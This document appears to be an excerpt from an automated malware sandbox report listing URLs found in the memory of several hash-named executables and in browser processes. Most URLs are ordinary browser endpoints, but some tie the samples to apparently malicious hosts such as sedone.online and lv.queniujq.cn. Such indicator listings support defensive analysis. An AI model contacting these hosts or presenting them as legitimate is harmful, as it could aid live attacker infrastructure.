Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Connecting
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3461653529.00000269DB8A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000027.00000003.3356799195.00000269E458F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3368546826.00000269E4596000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000027.00000003.3356799195.00000269E458F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3368546826.00000269E4596000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: chrome.exe, 00000014.00000002.3317180525.00001BA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000014.00000002.3317180525.00001BA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Minimum
Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000014.00000002.3317045511.00001BA800904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000014.00000002.3317045511.00001BA800904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000010.00000003.3153781356.000044C0016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152243921.000044C0017A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3154136056.000044C00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000014.00000003.3126241125.00001BA80087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.3316940891.00001BA8008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000014.00000002.3317180525.00001BA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000014.00000002.3317180525.00001BA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
Source: chrome.exe, 00000014.00000002.3316940891.00001BA8008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: chrome.exe, 00000014.00000003.3131825102.000010A0001E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000010.00000003.3153781356.000044C0016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152243921.000044C0017A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3154136056.000044C00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3433468138.00000269D82B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.commaybeShowOnboardingDialog
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: chrome.exe, 00000010.00000003.3112300126.000044C000FD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000010.00000003.3112300126.000044C000FD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000010.00000003.3109896893.000044C000FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000010.00000003.3154939790.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000010.00000003.3105141790.000044C000A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000010.00000003.3105141790.000044C000A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000010.00000003.3105141790.000044C000A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000010.00000003.3105141790.000044C000A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000010.00000003.3105141790.000044C000A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000010.00000003.3105141790.000044C000A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000010.00000003.3105141790.000044C000A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000010.00000003.3109896893.000044C000FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: chrome.exe, 00000010.00000003.3109896893.000044C000FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: chrome.exe, 00000014.00000002.3312502333.000010A000130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.3311779773.000010A000068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3456131295.00000269D9FB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3433468138.00000269D82B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comupgradeTabsProgressListenershowBadgeOnlyNotificationaccount-connectio
Source: chrome.exe, 00000014.00000002.3312502333.000010A000130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.3312464526.000010A000114000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: 95bf820dd4.exe, 0000000E.00000003.2927405446.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online
Source: 95bf820dd4.exe, 0000000E.00000003.3013616538.0000000000793000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/
Source: 95bf820dd4.exe, 0000000E.00000003.3094894921.0000000000792000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3084521833.0000000000791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/L
Source: 95bf820dd4.exe, 0000000E.00000003.3060088128.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3037089965.0000000000793000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/W
Source: 95bf820dd4.exe, 0000000E.00000003.3257684679.0000000000791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/X
Source: 95bf820dd4.exe, 0000000E.00000003.3094894921.0000000000792000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3257684679.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3084521833.0000000000791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/Y
Source: 95bf820dd4.exe, 0000000E.00000003.3257684679.0000000000791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/d
Source: 95bf820dd4.exe, 0000000E.00000003.3060088128.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3084521833.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3037089965.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3013616538.0000000000793000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/e
Source: 95bf820dd4.exe, 0000000E.00000003.3094894921.0000000000792000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3257684679.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.2986323548.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3060088128.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3084521833.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3037089965.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3013616538.0000000000793000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/n
Source: 95bf820dd4.exe, 0000000E.00000003.3094894921.0000000000792000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3257684679.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3060088128.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3084521833.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3037089965.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 95bf820dd4.exe, 0000000E.00000003.3013616538.0000000000793000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online/s
